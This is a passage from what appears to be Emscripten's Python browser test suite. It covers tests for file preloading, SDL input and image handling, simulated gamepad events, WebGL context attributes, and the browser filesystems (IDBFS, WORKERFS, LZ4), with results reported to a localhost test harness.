<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.disableErrorReporting = true;
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test test missing file should run xhr.onload with status different than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
@also_with_wasmfs
def test_dev_random(self):
self.btest_exit(Path('filesystem/dev_random.cpp'))
def test_sdl_swsurface(self):
self.btest_exit('sdl_swsurface.c', args=['-lSDL', '-lGL'])
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
src = test_file('sdl_image.c')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.btest_exit(src, args=[
'-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
@also_with_wasmfs
def test_sdl_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
src = test_file('sdl_image.c')
self.btest_exit(src, args=[
'-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
@parameterized({
'': ([],),
# add testing for closure on preloaded files + ENVIRONMENT=web (we must not
# emit any node.js code here, see
# https://github.com/emscripten-core/emscripten/issues/14486
'closure_webonly': (['--closure', '1', '-sENVIRONMENT=web'],)
})
def test_sdl_image_prepare_data(self, args):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'] + args, manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest_exit('sdl_stb_image_cleanup.c', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest_exit('sdl_canvas.c', args=['-sLEGACY_GL_EMULATION', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest_exit('sdl_canvas.c', args=['-sLEGACY_GL_EMULATION', '-O0', '-sSAFE_HEAP', '-lSDL', '-lGL'])
self.clear()
self.btest_exit('sdl_canvas.c', args=['-sLEGACY_GL_EMULATION', '-O2', '-sSAFE_HEAP', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(test_file(self.reference if reference is None else reference))
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % read_file('reftest.js'))
create_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([test_file('hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-sGL_TESTING', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-sASSERTIONS', '-sSAFE_HEAP', '-sASYNCIFY']
]:
print(delay, defines, async_)
create_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
self.compile_btest([test_file('sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest_exit('canvas_focus.c')
def test_keydown_preventdefault_proxy(self):
def post():
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-sEXPORTED_FUNCTIONS=_main'], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify=0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest_exit('glut_touchevents.c', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest_exit('glut_wheelevents.c', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL'])
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL'])
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.btest_exit('sdl_joystick.c', args=['-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.btest_exit('sdl_joystick.c', args=['-O2', '--minify=0', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.btest_exit(test_file('test_glfw_joystick.c'), args=['-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-sUSE_GLFW=3'])
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
create_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = test_file('test_webgl_context_attributes_common.c')
temp_filepath = os.path.basename(filepath)
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest_exit('test_webgl_context_attributes_glut.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_sdl.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_sdl2.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-sUSE_SDL=2', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_glfw.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes desactivated
self.btest_exit('test_webgl_context_attributes_glut.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_sdl.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest_exit('test_webgl_context_attributes_glfw.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest_exit('webgl_error.cpp')
@requires_graphics_hardware
def test_webgl_parallel_shader_compile(self):
self.btest_exit('webgl_parallel_shader_compile.cpp')
@requires_graphics_hardware
def test_webgl_explicit_uniform_location(self):
self.btest_exit('webgl_explicit_uniform_location.c', args=['-sGL_EXPLICIT_UNIFORM_LOCATION=1', '-sMIN_WEBGL_VERSION=2'])
@requires_graphics_hardware
def test_webgl_sampler_layout_binding(self):
self.btest_exit('webgl_sampler_layout_binding.c', args=['-sGL_EXPLICIT_UNIFORM_BINDING=1'])
@requires_graphics_hardware
def test_webgl2_ubo_layout_binding(self):
self.btest_exit('webgl2_ubo_layout_binding.c', args=['-sGL_EXPLICIT_UNIFORM_BINDING=1', '-sMIN_WEBGL_VERSION=2'])
# Test that -sGL_PREINITIALIZED_CONTEXT works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest_exit('preinitialized_webgl_context.cpp', args=['-sGL_PREINITIALIZED_CONTEXT', '--shell-file', test_file('preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-sUSE_PTHREADS'], ['-sENVIRONMENT=web', '-O2', '--closure=1']]:
self.btest_exit('emscripten_get_now.cpp', args=args)
def test_write_file_in_environment_web(self):
self.btest_exit('write_file.c', args=['-sENVIRONMENT=web', '-Os', '--closure=1'])
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['-sEXIT_RUNTIME', '--shell-file', test_file('test_fflush.html')], reporting=Reporting.NONE)
def test_file_db(self):
secret = str(time.time())
create_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-sFORCE_FILESYSTEM'])
shutil.copyfile('test.html', 'second.html')
create_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'])
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-sEXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_test,_success', '-sEXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-sEXIT_RUNTIME', '-sASYNCIFY']
secret = str(time.time())
self.btest(test_file('fs/test_idbfs_fsync.c'), '1', args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js'])
self.btest(test_file('fs/test_idbfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"', '-sEXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = ['-sASYNCIFY', '-sEXIT_RUNTIME']
secret = str(time.time())
self.btest(test_file('fs/test_memfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(test_file('fs/test_workerfs_read.c'), '1', args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
create_file('file1.txt', 'first')
ensure_dir('sub')
create_file('sub/file2.txt', 'second')
self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', Path('sub/file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(Path('fs/test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_file('file1.txt', '0123456789' * (1024 * 128))
create_file('subdir/file2.txt', '1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
create_file('file3.txt', random_data, binary=True)
# compress in emcc, -sLZ4 tells it to tell the file packager
print('emcc-normal')
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['-sLZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(Path('subdir/file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['-sLZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
create_file('files.js', out, binary=True)
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-sLZ4=1', '-sFORCE_FILESYSTEM'])
print(' opts')
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-O2'])
print(' modularize')
self.compile_btest([test_file('fs/test_lz4fs.cpp'), '--pre-js', 'files.js', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-sMODULARIZE=1'])
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
Module()
</script>
''')
self.run_browser('a.html', '.', '/report_result?2')
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
